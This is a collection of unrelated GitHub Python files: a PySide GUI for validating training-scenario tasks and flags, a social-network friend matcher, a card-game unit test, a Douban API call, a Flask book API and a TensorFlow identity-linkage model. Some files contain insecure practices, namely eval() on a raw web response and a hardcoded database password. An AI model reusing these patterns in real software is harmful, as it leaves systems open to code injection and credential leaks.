font1.setWeight(75)\n self.lb_complete.setFont(font1)\n\n self.verticalLayout_3.addWidget(self.lb_complete, 0, Qt.AlignHCenter)\n\n self.progressBar = QProgressBar(self.progress_frame)\n self.progressBar.setObjectName(u\"progressBar_\" + str(scenario.id))\n self.progressBar.setStyleSheet(u\"background-color: rgb(232, 232, 232);\")\n setattr(self.ui,\"progressBar_\" + str(scenario.id),self.progressBar)\n ##setting value based on the current progress\n updateProgressBar(self,scenario)\n\n self.verticalLayout_3.addWidget(self.progressBar)\n\n\n self.verticalLayout_2.addWidget(self.progress_frame, 0, Qt.AlignTop)\n\n self.footer_frame = QFrame(self.card)\n self.footer_frame.setObjectName(u\"footer_frame_\" + str(scenario.id))\n self.footer_frame.setFrameShape(QFrame.StyledPanel)\n self.footer_frame.setFrameShadow(QFrame.Raised)\n self.horizontalLayout = QHBoxLayout(self.footer_frame)\n self.horizontalLayout.setObjectName(u\"horizontalLayout_\" + str(scenario.id))\n self.bt_start = QPushButton(self.footer_frame)\n self.bt_start.setObjectName(u\"bt_start\" + str(scenario.id))\n sizePolicy = QSizePolicy(QSizePolicy.Minimum, QSizePolicy.Preferred)\n sizePolicy.setHorizontalStretch(5)\n sizePolicy.setVerticalStretch(5)\n sizePolicy.setHeightForWidth(self.bt_start.sizePolicy().hasHeightForWidth())\n self.bt_start.setSizePolicy(sizePolicy)\n font2 = QFont()\n font2.setPointSize(12)\n self.bt_start.setFont(font2)\n self.bt_start.setCursor(QCursor(Qt.PointingHandCursor))\n self.bt_start.setStyleSheet(u\"background-color: rgb(7, 226, 87);\")\n\n self.horizontalLayout.addWidget(self.bt_start)\n\n\n self.verticalLayout_2.addWidget(self.footer_frame)\n\n self.lb_scenario_name.setText(QCoreApplication.translate(\"MainWindow\", u\"\"+scenario.title, None))\n self.lb_scenario_name.setWordWrap(True)\n self.lb_complete.setText(QCoreApplication.translate(\"MainWindow\", u\"Complete\", None))\n self.bt_start.setText(QCoreApplication.translate(\"MainWindow\", u\"Start\", None))\n\n self.bt_start.clicked.connect(lambda: self.ui.sw_header.setCurrentWidget(self.ui.tasks_header))\n self.bt_start.clicked.connect(lambda: self.ui.sw_lists.setCurrentWidget(self.ui.tasks))\n self.bt_start.clicked.connect(lambda: generateTasks(self, scenario))\n\n self.ui.gridLayout.addWidget(self.card, positionX, positionY, 1, 1, Qt.AlignHCenter | Qt.AlignVCenter)\n\n#########################################\n## Method to generate task widget\n#########################################\ndef generateTasks(self,scenario):\n ##HEADER\n ## Init Button and set Titles\n ## Activate Back Button\n self.ui.bt_back.clicked.connect(lambda: self.ui.sw_header.setCurrentWidget(self.ui.scenarios_header))\n self.ui.bt_back.clicked.connect(lambda: self.ui.sw_lists.setCurrentWidget(self.ui.scenarios))\n self.ui.bt_back.clicked.connect(lambda: calculateCurrent(self, scenario))\n ## Set title\n self.ui.lb_scenario_name_in_task_header.setText(QCoreApplication.translate(\"MainWindow\", scenario.title, None))\n \n ##BODY\n ## Init Previous/Next step buttons and set labels (hide sucess label + update description)\n # Disable previous button on first step and next button on last step\n # Disable next button if the current one is unfinished\n disalbeButtons(self,scenario)\n \n # last argument is representing the flag to distinguish which button was pressed\n self.ui.bt_previous.clicked.connect(lambda: generateTask(self, scenario, -1))\n self.ui.bt_next.clicked.connect(lambda: generateTask(self, scenario, 1))\n generateTask(self, scenario, 0)\n #x = 0\n #for validation in scenario.validations:\n # print(vars(validation))\n # generateValidation(self,validation,x, scenario)\n # x = x + 1\n\n#########################################\n## Method to disable next/previous button\n#########################################\ndef disalbeButtons(self, scenario):\n # Disable previous button on first step and next button on last step\n # Disable next button if the current one is unfinished\n if(scenario.current == 1):\n self.ui.bt_previous.setEnabled(False)\n else:\n self.ui.bt_previous.setEnabled(True)\n \n validationID = scenario.current - 1\n if(scenario.steps < scenario.current + 1):\n self.ui.bt_next.setEnabled(False)\n elif scenario.validations[validationID + 1].completed == \"false\":\n self.ui.bt_next.setEnabled(False)\n else:\n self.ui.bt_next.setEnabled(True)\n\n#########################################\n## Method to generate one task widget\n#########################################\ndef generateTask(self, scenario, bt_clicked):\n task_to_generate = scenario.validations[0]\n\n if bt_clicked == 0:\n task_to_generate = scenario.validations[scenario.current - 1]\n elif bt_clicked == 1:\n task_to_generate = scenario.validations[scenario.current]\n scenario.current = task_to_generate.id\n disalbeButtons(self, scenario)\n elif bt_clicked == -1:\n print(\"We here\")\n task_to_generate = scenario.validations[scenario.current - 2]\n scenario.current = task_to_generate.id\n disalbeButtons(self, scenario)\n\n #Change header \n self.ui.lb_validation_step_in_task_header.setText(QCoreApplication.translate(\"MainWindow\", u\"Task \" + str(scenario.current) + \" / \" + str(scenario.steps), None))\n \n if(task_to_generate.completed == \"true\"):\n disableUI(self)\n else:\n enableUI(self) \n\n ######################################################################\n ## SETTING TEXT AND METHODS \n ######################################################################\n \n self.ui.lb_description.setText(QCoreApplication.translate(\"MainWindow\", task_to_generate.task, None))\n self.ui.lb_msg_success.setText(QCoreApplication.translate(\"MainWindow\", \"\", None))\n self.ui.lineEdit.setText(QCoreApplication.translate(\"MainWindow\", \"\", None))\n \n if(task_to_generate.type == 'flag'):\n self.ui.lineEdit.setPlaceholderText(QCoreApplication.translate(\"MainWindow\", u\"Insert flag\", None))\n elif(task_to_generate.type == 'internal command' or 'external command'):\n self.ui.lineEdit.setPlaceholderText(QCoreApplication.translate(\"MainWindow\", u\"Submit to start automated test\", None))\n self.ui.lineEdit.setReadOnly(True)\n elif(task_to_generate.type == 'none'):\n self.ui.lineEdit.setPlaceholderText(QCoreApplication.translate(\"MainWindow\", u\"Submit to continue\", None))\n self.ui.lineEdit.setReadOnly(True) \n\n listOfObjects = [self.ui.lineEdit, self.ui.bt_submit, self.ui.lb_msg_success] \n\n self.ui.bt_submit.setText(QCoreApplication.translate(\"MainWindow\", u\"Submit\", None))\n self.ui.bt_submit.clicked.connect(lambda: validate(self, task_to_generate, listOfObjects, scenario))\n\n#########################################\n## Method to add some attributes to UI elements\n#########################################\ndef customUISetup(self):\n self.ui.setupUi(self)\n ## REMOVE WINDOW\n self.setWindowFlags(QtCore.Qt.FramelessWindowHint)\n ## ADD EFFECTS\n self.setAttribute(QtCore.Qt.WA_TranslucentBackground)\n self.shadow = QGraphicsDropShadowEffect(self)\n self.shadow.setBlurRadius(50)\n self.shadow.setXOffset(0)\n self.shadow.setYOffset(0)\n self.shadow.setColor(QColor(0,92,157,550))\n self.ui.centralwidget.setGraphicsEffect(self.shadow)\n ## CHANGE TITLE AND ICON\n self.setWindowIcon(QtGui.QIcon(\":/icons/icons8-system-information-50.png\"))\n self.setWindowTitle(\"Validation System\")\n\n ## CONNECT CLOSE AND MINIMIZE BUTTONS\n self.ui.bt_minimize_window.clicked.connect(lambda: self.showMinimized())\n self.ui.bt_close_window.clicked.connect(lambda: self.close())\n\n#########################################\n## Method to validate the solution\n#########################################\ndef validate(self, validation, listOfObjects, scenario):\n answer = listOfObjects[0]\n button = listOfObjects[1]\n label = listOfObjects[2]\n \n response = getFlagcheck(self,scenario.id,validation.id,answer.text())\n print(response.status_code)\n if(response.status_code == 200):\n api_answer = response.json()\n if api_answer['answer'] == 'True' :\n validateSuccess(self, validation, answer, button, label, scenario)\n elif api_answer['answer'] == 'False' :\n label.setText(QCoreApplication.translate(\"MainWindow\", u\"Wrong!\", None))\n label.setStyleSheet(u\"color: rgb(255, 21, 21);\")\n elif api_answer['answer'] != '' :\n # run the script\n result = runControllScript(self, api_answer['answer'], scenario.id, validation.id)\n print(\"Result from API: \" + result)\n if result == 'True' :\n \tvalidateSuccess(self, validation, answer, button, label, scenario)\n elif result == 'False' :\n \tlabel.setText(QCoreApplication.translate(\"MainWindow\", u\"Wrong!\", None))\n \tlabel.setStyleSheet(u\"color: rgb(255, 21, 21);\")\n \ndef validateSuccess(self, validation, answer, button, label, scenario):\n # update components\n # Set success text + backgroud color to green, lock button and input field\n label.setStyleSheet(u\"color: rgb(49, 255, 3);\")\n label.setText(QCoreApplication.translate(\"MainWindow\", u\"Success\", None))\n button.setStyleSheet(u\"background-color: rgb(49, 255, 3);\")\n \n # update progress bar and validation locally\n #scenario = updateProgressBar(self, scenario)\n #validation.completed = \"true\"\n scenario.calculateProgress(scenario.current, scenario.steps)\n updateProgressBar(self, scenario)\n\n disableUI(self)\n \n#########################################\n## Method to calculate current step\n#########################################\ndef calculateCurrent(self,scenario):\n for step in scenario.validations:\n if step.completed == \"false\":\n scenario.current = step.id\n\ndef disableUI(self):\n # allow user to proceed to the next step\n self.ui.bt_next.setEnabled(True) \n #lock button and input field\n self.ui.bt_submit.setEnabled(False)\n self.ui.lineEdit.setReadOnly(True)\n\ndef enableUI(self):\n #lock button and input field\n self.ui.bt_submit.setEnabled(True)\n self.ui.lineEdit.setReadOnly(False)\n \n \ndef updateProgressBar(self, scenario):\n #currently dummy solution\n if(scenario.id == 0):\n self.ui.progressBar_0.setValue(scenario.progress)\n if(scenario.id == 1):\n self.ui.progressBar_1.setValue(scenario.progress)\n if(scenario.id == 2):\n self.ui.progressBar_2.setValue(scenario.progress)\n if(scenario.id == 3):\n self.ui.progressBar_3.setValue(scenario.progress)\n if(scenario.id == 4):\n self.ui.progressBar_4.setValue(scenario.progress)\n if(scenario.id == 5):\n self.ui.progressBar_5.setValue(scenario.progress)\n","repo_name":"harbingerr/Validation-System","sub_path":"validation system desktop app/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":13802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37786533423","text":"import ast\nimport shutil\nfrom io import StringIO\nfrom contextlib import contextmanager\n\n\n@contextmanager\ndef optional_file_open(optional_path, *args, **kwargs):\n \"\"\"Open a fileobj pointing to a file or a StringIO obj if None.\n Argument:\n :optional_path: A path to open. If None, a StringIO obj is used.\n\n Optional Arguments:\n :close: (default True) If the object is a fileobj, indicates if should\n be closed at the end.\n \"\"\"\n close = kwargs.pop('close', False)\n if optional_path:\n fp = open(optional_path, *args, **kwargs)\n else:\n fp = StringIO()\n try:\n yield fp\n finally:\n if optional_path and close:\n fp.close()\n\n\ndef is_valid_python_code(code):\n try:\n ast.parse(code)\n except SyntaxError:\n return False\n return True\n\n\ndef _email_txt_file_to_python_set(txt_path, result_path=None, validate=True,\n set_variable_name='INVALID_DOMAIN_SETS'):\n \"\"\"Turns a multiline text file into a valid Python set.\n \"\"\"\n sio = StringIO()\n with open(txt_path, 'r') as origin:\n sio.write('%s = {' % set_variable_name)\n\n for line in origin:\n sio.write(\"'{}', \".format(line.strip()))\n\n sio.write('}')\n sio.seek(0)\n if validate and not is_valid_python_code(sio.read()):\n raise ValueError('Python Code Invalid. Check original file')\n\n sio.seek(0)\n if result_path:\n with open(result_path, 'w') as fp:\n shutil.copyfileobj(sio, fp)\n sio.close()\n return sio\n\n\nif __name__ == '__main__':\n _email_txt_file_to_python_set(\n 'throwaway_domains.txt', 'invalid_domains.py')\n","repo_name":"santiagobasulto/lambda-email-verifier","sub_path":"code_utils.py","file_name":"code_utils.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1176521125","text":"import json\nimport sys\n\ndef main():\n\topen('static/final.txt', 'w').close()\n\tfile = open('static/final.txt', 'a+')\n\n\tfbFriends = []\n\tfriends = []\n\tfollowers = []\n\tcommon = []\n\tcommonUgly = []\n\tnumberCommon = 0\n\n\tdata = openFile('static/fbFriends.json')\n\tfor criteria in data['data']:\n\t\tfor key, value in criteria.items():\n\t\t\tif key == \"name\":\n\t\t\t\t# print(key, 'is:', value)\n\t\t\t\tfbFriends.append(value)\n\t\t# print('')\n\t# print(fbFriends)\n\n\tdata = openFile('static/friends.json')\n\tfor users in data['users']:\n\t\tfor criteria in users:\n\t\t\tfor key, value in criteria.items():\n\t\t\t\tif key == \"name\":\n\t\t\t\t\t# print(key, 'is:', value)\n\t\t\t\t\tfriends.append(value)\n\t\t\t\tif key == \"screen_name\":\n\t\t\t\t\tfriends.append(value)\n\t\t\t# print('')\n\t# print(friends)\n\n\tdata = openFile('static/followers.json')\n\tfor users in data['users']:\n\t\tfor criteria in users:\n\t\t\tfor key, value in criteria.items():\n\t\t\t\tif key == \"name\":\n\t\t\t\t\t# print(key, 'is:', value)\n\t\t\t\t\tfriends.append(value)\n\t\t\t\tif key == \"screen_name\":\n\t\t\t\t\tfriends.append(value)\n\t\t\t# print('')\n\t# print(followers)\n\n\tfor amigo in fbFriends:\n\t\ttempAmigo = ''.join(e for e in amigo if e.isalnum())\n\t\ttempAmigo = tempAmigo.lower()\n\t\tfor van in friends:\n\t\t\ttempVan = ''.join(e for e in van if e.isalnum())\n\t\t\ttempVan = tempVan.lower()\n\t\t\tif tempAmigo == tempVan:\n\t\t\t\t# print('Found one: ' + amigo)\n\t\t\t\tcommon.append(amigo)\n\t\t\t\tcommonUgly.append(tempAmigo)\n\t\t\t\tnumberCommon = numberCommon + 1\n\n\tfor amigo in fbFriends:\n\t\ttempAmigo = ''.join(e for e in amigo if e.isalnum())\n\t\ttempAmigo = tempAmigo.lower()\n\t\tfor van in followers:\n\t\t\ttempVan = ''.join(e for e in van if e.isalnum())\n\t\t\ttempVan = tempVan.lower()\n\t\t\tif tempAmigo == tempVan:\n\t\t\t\tif tempAmigo not in commonUgly:\n\t\t\t\t\t# print('Found one: ' + amigo)\n\t\t\t\t\tcommon.append(amigo)\n\t\t\t\t\tnumberCommon = numberCommon + 1\n\t\t\t\t# else:\n\t\t\t\t# \tprint('Found duplicate: ' + amigo)\n\n\tnewCommon= []\n\n\tif numberCommon > 0:\n\t\tfor i in common:\n\t\t\tif i not in newCommon:\n\t\t\t\tnewCommon.append(i)\n\t\t\telse:\n\t\t\t\tnumberCommon = numberCommon - 1\n\t\tprint(\"\\n Friends in common: \" + str(newCommon))\n\t\tprint(\"\\n Number of friends in common: \" + str(numberCommon))\n\telse:\n\t\tprint(\"\\n No friends in common found...\")\n\tfile.write(str(newCommon) + \"\\n\")\n\tfile.write(str(numberCommon) + \"\\n\")\n\n\tfbLocation = \"\"\n\thometown = \"\"\n\tlocation = \"\"\n\tdata = openFile('static/userData.json')\n\ttry:\n\t\tfbLocation = data[\"location\"][\"name\"]\n\t\tfbLocation = fbLocation.split(',', 1)[0]\n\texcept KeyError:\n\t\tpass\n\ttry:\n\t\thometown = data[\"hometown\"][\"name\"]\n\t\thometown = hometown.split(',', 1)[0]\n\texcept KeyError:\n\t\tpass\n\n\tdata = openFile('static/user.json')\n\ttry:\n\t\tlocation = data[\"location\"]\n\t\tlocation = location.split(',', 1)[0]\n\texcept KeyError:\n\t\tpass\n\n\tif location == fbLocation or location == hometown:\n\t\tprint(\"\\n Common location found: \" + location)\n\t\tfile.write(location + \"\\n\")\n\telse:\n\t\tprint(\"\\n No common location found...\")\n\t\tfile.write(\"\")\n\ndef openFile(f):\n\ttry:\n\t\tdata = json.load(open(f))\n\t\treturn data\n\texcept FileNotFoundError:\n\t\tprint(f + \" not found\")\n\t\tsys.exit()\n\nif __name__ == \"__main__\":main()\n","repo_name":"AntoineChwat/SAS","sub_path":"compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14372041741","text":"import unittest\nfrom csrv.model import cards\nfrom csrv.model.cards import corp\nfrom csrv.model import deck\nfrom csrv.model import game\nfrom csrv.model import premade_decks\nfrom csrv.model import test_base\nfrom csrv.model import timing_phases\nfrom csrv.model.cards.runner import card01006\n\n\nclass Card01006Test(test_base.TestBase):\n\n def setUp(self):\n test_base.TestBase.setUp(self)\n self.card = card01006.Card01006(self.game, self.game.runner)\n self.game.runner.clicks.set(4)\n self.game.runner.credits.set(5)\n self.game.runner.grip.add(self.card)\n self.game.insert_next_phase(\n timing_phases.RunnerTurnActions(self.game, self.game.runner))\n\n def tearDown(self):\n self.card.trash()\n\n def test_install_card01006(self):\n self.assertIn(\n self.card.install_action, self.game.current_phase().choices())\n self.game.resolve_current_phase(self.card.install_action, None)\n self.assertEqual(6, self.game.runner.free_memory)\n\n def test_card01006_adds_virus_counter(self):\n self.game.runner.rig.add(self.card)\n virus = [c for c in self.runner.stack.cards if c.NAME == 'Card01008'][0]\n self.game.runner.rig.add(virus)\n self.assertEqual(1, virus.virus_counters)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"mrroach/CentralServer","sub_path":"csrv/model/cards/runner/card01006_test.py","file_name":"card01006_test.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"36121466641","text":"#!/usr/bin/python\n#coding=utf-8\n\nimport urllib2\nimport openpyxl\n\nif __name__=='__main__':\n url = u\"https://api.douban.com/v2/book/search?q=python\"\n response = urllib2.urlopen(url)\n\n\n response_str = response.read()\n # 将string转换成dict\n response_dic = eval(response_str)\n count = response_dic['count']\n total = response_dic['total']\n print(count)\n print(total)","repo_name":"sfSanfrod/LearnPython","sub_path":"testSyntax/sendRequest.py","file_name":"sendRequest.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9710118589","text":"from rest_framework import permissions\n\nclass UpdateOwnProfile(permissions.BasePermission):\n \"\"\"Membuat permission hanya bisa edit profile sendiri\"\"\"\n \n def has_object_permission(self, request, view, obj):\n \"\"\"Mengecek apakah user berusaha unutk mengedit profile sendiri\"\"\"\n if request.method in permissions.SAFE_METHODS:\n return True\n \n return obj.id == request.user.id\n\nclass UpdateOwnStatus(permissions.BasePermission):\n \"\"\"Memperbolehkan user hanya mengupdate feed sendiri\"\"\"\n\n def has_object_permission(self, request, view, obj):\n \"\"\"Check the user is trying to update their own status\"\"\"\n if request.method in permissions.SAFE_METHODS:\n return True\n \n return obj.user_profile.id == request.user.id","repo_name":"Ianphantom/profiles-rest-api","sub_path":"profiles_api/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72179836964","text":"from flask import Flask, jsonify, request\nimport pyodbc\n\napp = Flask(__name__)\n\nserver = '(local)'\ndatabase = 'BooksAFewHundred'\nusername = 'Ted'\npassword = 'book'\n\nconn = pyodbc.connect(\n 'DRIVER={SQL Server};SERVER=' + server + ';DATABASE=' + database + ';UID=' + username + ';PWD=' + password)\n\n\n@app.route('/books/<string:genre>', methods=['GET'])\ndef get_books_by_genre(genre):\n cursor = conn.cursor()\n query = 'SELECT ISBN, Name FROM Book WHERE ' \\\n 'Genre = ?'\n cursor.execute(query, genre)\n rows = cursor.fetchall()\n\n result = []\n for row in rows:\n item = {\n 'Name': row[1],\n }\n result.append(item)\n\n return jsonify(result)\n\n\n@app.route('/books/top-sellers', methods=['GET'])\ndef get_top_sellers():\n cursor = conn.cursor()\n query = 'SELECT TOP 10 ISBN, Name FROM Book ' \\\n 'ORDER BY CopiesSold DESC'\n cursor.execute(query)\n rows = cursor.fetchall()\n\n result = []\n for row in rows:\n item = {\n 'Name': row[1],\n }\n result.append(item)\n\n return jsonify(result)\n\n\n@app.route('/books/rating', methods=['GET'])\ndef get_books_by_rating():\n rating = request.args.get('rating')\n if rating is None:\n return jsonify({'error': 'Rating parameter is missing.'}), 400\n\n try:\n rating = int(rating)\n except ValueError:\n return jsonify({'error': 'Rating must be an integer.'}), 400\n\n cursor = conn.cursor()\n query = 'SELECT b.Name FROM Rating r LEFT JOIN Book b ON b.ISBN = r.BookID WHERE Rating >= ?'\n cursor.execute(query, rating)\n rows = cursor.fetchall()\n\n result = []\n for row in rows:\n item = {\n 'Name': row[0],\n }\n result.append(item)\n\n return jsonify(result)\n\n\n@app.route('/books/discount', methods=['PUT', 'PATCH'])\ndef discount_books_by_publisher():\n data = request.get_json()\n discount_percent = data.get('discount_percent')\n publisher = data.get('publisher')\n\n if not discount_percent or not publisher:\n return jsonify({'error': 'Discount percent and publisher are required parameters.'}), 400\n\n try:\n discount_percent = float(discount_percent)\n except ValueError:\n return jsonify({'error': 'Discount percent must be a valid number.'}), 400\n\n cursor = conn.cursor()\n query = 'Update book set Price = (Price - (Price * ?)) FROM Book b LEFT JOIN Publisher p ON b.PublisherID = ' \\\n 'p.PublisherID WHERE p.PublisherID = ?'\n cursor.execute(query, discount_percent, publisher)\n conn.commit()\n\n return jsonify({'message': 'Books discounted successfully.'})\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"varb24/Group5","sub_path":"pycharm/flaskBooks/Sprint4VersionCC.py","file_name":"Sprint4VersionCC.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"334645447","text":"from src.m_utils import constants as cts\nfrom src.base.data_loaders.data_loader import DataLoader, DLName\n\nclass IMFDB_DL(DataLoader):\n def __init__(self, aligned):\n super().__init__(DLName.IMFDB, aligned, f'{cts.BASE_PATH}/indian_facial_db/database/Version 1/Images', True)\n self.set_dirs_paths()\n super().set_output_path()\n super().load_data_df()\n \n def set_dirs_paths(self):\n self.train_dirs_paths = [self.dataset_path]\n self.test_dirs_paths = []\n \n","repo_name":"guilhermemg/nas_v1","sub_path":"project/src/base/data_loaders/imfdb_loader.py","file_name":"imfdb_loader.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16209849918","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"project-etl\",\n version=\"0.1.0\",\n author=\"Prosperia Social\",\n author_email=\"developers.etl@prosperia.ai\",\n maintainer=\"Rodrigo Lara Molina\",\n maintainer_email=\"rodrigo@prosperia.ai\",\n description=\"A template library for procedures specific to every project\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.7',\n)","repo_name":"AlejandroCoronadoN/mepyd-incluia","sub_path":"src/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21248712006","text":"import struct\nimport unittest\n\nimport plash_core\nimport plash.env\nimport plash.namespace\n\n\nclass FsOpTest(unittest.TestCase):\n\n def test_exec(self):\n fs_op = plash.namespace.make_fs_op(plash.env.get_root_dir())\n input_args = [\"arg1\", \"argument2\", \"x\"]\n filename, argv, exec_fds = \\\n fs_op.fsop_exec(\"/bin/echo\", [\"argv0\"] + input_args)\n # The start part of the result argv depends on ld.so location,\n # so we only check the end.\n self.assertEquals(argv[-len(input_args):], input_args)\n for argv_index, fd in exec_fds:\n assert isinstance(argv_index, int)\n assert isinstance(fd, plash_core.FD)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"mseaborn/plash","sub_path":"plash/tests/fsop_test.py","file_name":"fsop_test.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"11367330750","text":"import tensorflow as tf\nimport numpy as np\nimport os\nfrom gensim.models.keyedvectors import KeyedVectors\n\ndata_path = os.path.abspath('..') + '/data/'\n# we use gensim(a useful tool) to get embedding vector, due to the privacy protection,\n# we only provide the embedding data\ntwitter_embedding_path = data_path + 'twitter_embedding.emb'\ntwitter_vocab_path = data_path + 'twitter_model.vocab'\nfoursquare_embedding_path = data_path + 'foursquare_embedding.emb'\nfoursquare_vocab_path = data_path + 'foursquare_model.vocab'\n# there are 3148 anchor users in data set, we use 2098 users for training, 1050 users for testing\nconnect_data_path = data_path + 'trainConnect.txt'\nconnect_test_data_path = data_path + 'testConnect.txt'\n# in this simplified version, we will train our model directly\n# connect_warm_up_data_path = data_path + 'trainConnect_400_warm_up.txt'\n# our embedding data size is 800\nembedding_size = 800\n# load the embedding vector using gensim\nx_vectors = KeyedVectors.load_word2vec_format(foursquare_embedding_path, binary=False, fvocab=foursquare_vocab_path)\ny_vectors = KeyedVectors.load_word2vec_format(twitter_embedding_path, binary=False, fvocab=twitter_vocab_path)\ninputs = [] # train input vector\nlabels = [] # train label vector\ntest_inputs = [] # test input vectors\ntest_labels = [] # test label words\n\n\ndef load_data():\n f = open(connect_data_path)\n for line in f.readlines():\n line_array = line.strip().split(' ')\n if line_array[0] not in x_vectors.vocab.keys() or line_array[1] not in y_vectors.vocab.keys():\n print(\"======================warning!!!\" + line_array[0] + \" or \" + line_array[\n 1] + \"does not exsits!!!=====================================\")\n continue\n inputs.append(x_vectors[line_array[0]])\n labels.append(y_vectors[line_array[1]])\n print('input size:' + str(len(inputs)))\n print('labels size:' + str(len(labels)))\n\n\n# this function can be replace by tf.dense in a higher tensorflow version\ndef add_layer(input_data, in_size, out_size, activation_function=None):\n weights = tf.Variable(tf.random_normal([in_size, out_size]))\n biases = tf.Variable(tf.zeros([1, out_size]) + 0.1)\n result = tf.matmul(input_data, weights) + biases\n if activation_function is None:\n outputs = result\n else:\n outputs = activation_function(result)\n return outputs\n\n\n# record the current data index\ndata_index = 0\n\n\n# note that: len(inputs) == len(labels)\ndef generate_batch(type):\n \"\"\"\n get the batch data\n :param type: train or test\n :return: batch data\n \"\"\"\n global data_index\n if type == 'train':\n if data_index + batch_size >= len(inputs): # the case that now_index + batch_size > total data\n batch_inputs = inputs[data_index:]\n batch_labels = labels[data_index:]\n data_index = batch_size - len(batch_inputs)\n for d in inputs[:data_index]:\n batch_inputs.append(d)\n for l in labels[:data_index]:\n batch_labels.append(l)\n else:\n batch_inputs = inputs[data_index:data_index + batch_size]\n batch_labels = labels[data_index:data_index + batch_size]\n data_index += batch_size\n return batch_inputs, batch_labels\n elif type == 'test':\n f = open(connect_test_data_path)\n for line in f.readlines():\n line_array = line.strip().split(' ')\n if line_array[0] not in x_vectors.vocab.keys() or line_array[1] not in y_vectors.vocab.keys():\n print(\"======================warning!!!\" + line_array[0] + \" or \" + line_array[\n 1] + \"does not exsits!!!=====================================\")\n continue\n test_inputs.append(x_vectors[line_array[0]])\n test_labels.append(line_array[1])\n print('test_inputs size:' + str(len(test_inputs)))\n print('test_labels size:' + str(len(test_labels)))\n return test_inputs\n\n\ndef normalize_vector(vector):\n norm = tf.sqrt(tf.reduce_sum(tf.square(vector), 1, keep_dims=True))\n normalized_embeddings = vector / norm\n return normalized_embeddings\n\n\n# get the Levenshtein distance\ndef leven_dis(str1, str2):\n len_str1 = len(str1.lower()) + 1\n len_str2 = len(str2.lower()) + 1\n # create matrix\n matrix = [0 for n in range(len_str1 * len_str2)]\n # init x axis\n for i in range(len_str1):\n matrix[i] = i\n # init y axis\n for j in range(0, len(matrix), len_str1):\n if j % len_str1 == 0:\n matrix[j] = j // len_str1\n\n for i in range(1, len_str1):\n for j in range(1, len_str2):\n if str1[i - 1] == str2[j - 1]:\n cost = 0\n else:\n cost = 1\n matrix[j * len_str1 + i] = min(matrix[(j - 1) * len_str1 + i] + 1,\n matrix[j * len_str1 + (i - 1)] + 1,\n matrix[(j - 1) * len_str1 + (i - 1)] + cost)\n\n return matrix[-1]\n\n\ndef rank(topn, target):\n result = []\n for item in topn:\n max_length = len(item[0]) if len(item[0]) > len(target) else len(target)\n modify_value = ((max_length / 2.0 - leven_dis(item[0], target) * 1.0) / (max_length / 2.0)) * 0.05\n val = item[1] + modify_value\n if val > 1.0:\n val = 1.0\n if val < 0:\n val = 0\n result.append((item[0], val))\n result = sorted(result, key=lambda x: x[1], reverse=True)\n return result\n\n\n# build net\nxs = tf.placeholder(tf.float32, [None, embedding_size])\nys = tf.placeholder(tf.float32, [None, embedding_size])\nhidden_1 = add_layer(xs, embedding_size, 1200, None)\noutput_x = add_layer(hidden_1, 1200, embedding_size, None)\nresults = tf.matmul(normalize_vector(ys), normalize_vector(output_x), transpose_b=True)\nloss_x = 1 - tf.reduce_mean(tf.diag_part(results))\ntrain_step_x = tf.train.GradientDescentOptimizer(1).minimize(loss_x)\ninit = tf.global_variables_initializer()\nnum_steps = 2000001\n# due to the data is not big, we set a small batch size\nbatch_size = 1\n\nwith tf.Session() as session:\n print(\"program begin\")\n init.run()\n load_data()\n batch_size = 1\n average_loss = 0\n for step in range(num_steps):\n batch_inputs, batch_labels = generate_batch('train')\n feed_dict = {xs: batch_inputs, ys: batch_labels}\n loss_val, _ = session.run([loss_x, train_step_x], feed_dict=feed_dict)\n average_loss += loss_val\n if step % 2000 == 0:\n if step > 0:\n average_loss /= 2000\n print(\"Average loss_x at step \", step, \": \", average_loss)\n average_loss = 0\n if step % 20000 == 0:\n test_inputs = []\n test_labels = []\n prediction = session.run(output_x, feed_dict={xs: generate_batch('test')})\n count = 0\n total = np.zeros(101)\n for vector in prediction:\n number_in_topn = 0\n topn = y_vectors.similar_by_vector(vector=vector, topn=100)\n rank_result = rank(topn, test_labels[count])\n for item in rank_result:\n number_in_topn += 1\n if item[0] == test_labels[count]:\n index = number_in_topn\n while index < 101:\n total[index] += 1\n index += 1\n count += 1\n for i in range(1, 101):\n if i in [1, 5, 10, 15, 30, 100]:\n print('top ' + str(i) + ' : ' + str(total[i] / count))\n","repo_name":"KDD-HIEPT/DeepLink","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7645,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"52"} 